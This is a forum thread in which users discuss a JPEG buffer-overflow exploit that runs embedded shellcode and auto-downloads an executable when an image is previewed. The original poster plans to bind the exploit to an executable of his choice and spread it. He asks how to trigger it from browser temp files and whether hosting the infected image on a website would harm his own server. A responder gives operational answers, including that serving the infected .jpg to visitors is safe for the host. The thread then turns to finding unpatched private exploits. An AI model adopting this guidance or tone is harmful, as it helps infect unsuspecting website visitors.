yes i saw that and ok the hex is the actual exe, i meant i couldnt understand the code itself, i get what the program does but i like to understand the entire code and not just how it works but why, so i could rewrite to fit my needs and based on what you said you helped me to reverse engineer it, i wanted to SEE the exploit i guess you would say and i figured it out, i will post up a commented version of the code with the decyphered hex and explanations of the shell commands, just for any other programmers out there that could use the exploit in their own applications, my goal is to change this to use the expoit to bind directly with an exe of my choosing and im sure i can do it now knowing this exploit. when i get around to it i will write that for whoever is interested.
spectraL.. a million thanks, its not going to waste... I do have one question, would the exploit still work if the icon is displayed in gallery view by opening th folder? im pretty sure it would, if thats the case this would work perfectly in a cookie exploit where you can navigate temp internet files from the current domain... i have seen that somewhere so then the user would not have to download anything?
also will this infect my server when the clients browser requests the file if it was on a website? this could be a problem...
Anything which can trigger the preview on the local machine will create the buffer overflow and then start the embedded executable code and the auto-download process. It will not work if previewing the .jpg from a remote location. And if the .jpg is only auto-downloaded to the local temp files folder then the local user would have to actually browse to that folder and preview the file there. No, your own machine doesn't get infected when you serve the infected .jpg to visitors.
Anything which can trigger the preview on the local machine will create the buffer overflow and then start the embedded executable code and the auto-download process. It will not work if previewing the .jpg from a remote location. And if the .jpg is only auto-downloaded to the local temp files folder then the local user would have to actually browse to that folder and preview the file there. No, your own machine doesn't get infected when you serve the infected .jpg to visitors.
__________________
I have existed from the morning of the world, and I shall exist until the last star falls from the heavens. Although I have taken the form of Gaius Caligula, I am all men, as I am no man-- and, so, I am a god.
that is the unescaped decoded shellcode in the jpeg exploit, I just realised thats the whole point of the exploit. basically it saves a variable, which goes into the heap. once called from the heap it is reassigned a new allocated set of ram to reposition the heap, it then exploits the old heap and throws this in its place. i know a bit of assembler but i hate bitwise operators and i've never fully grasped the concept of them, nor have i really tried or had a need to since i'm using pretty mid level languages.
haha i just cant seem to see how this was able to slide the heap, i don't see anywhere a buffer overflow would occur but it has to be there,then again i dont know assembler and i hate machine level bit manipulation.... i need to start learning, ill try and have it down in the next few days, it has to be pretty easy, not to write exploits, but to learn basic commands. but if you know assembler, my hat goes off to you. that does not happen often due to the size of any good programmers ego. don't deny it. all in good fun haha
know any places to find some good private exploits that wouldn't be patched? i used to be a member of an invite only forum where you start with 0 downloads, every time you upload a exploit, application or script, you would get one download for everybody that downloaded yours and gave it above 80% rating. it was a great site but got shut down, that way exploits could still be shared privately and safely but only to people that would be able to use them but did not rely on other peoples hard work to "hack" (hate that word) and find ways to develop them and release their own developments. sadly it was shut down about 5 years ago. i still have a huge folder of all these apps and exploits but most are irrelevant now since it was so long ago.
...know any places to find some good private exploits that wouldn't be patched? ...
I realy only check out sites that have the POC available right there with the exploit. Here's a few hacking sites I'm rather fond of. Keep in mind, too.. many times when something is heralded as being patched it hasn't actually been patched. People in general, including programmers, are just plain liars and lazy shits. The only way to find out for sure is to try it out on your own machine and test to see if it's really patched. You'd be surprised at how many exploits still work even though it's been advertized as patched.
browser exploit
Re: browser exploit
Re: browser exploit
Re: browser exploit
Re: browser exploit
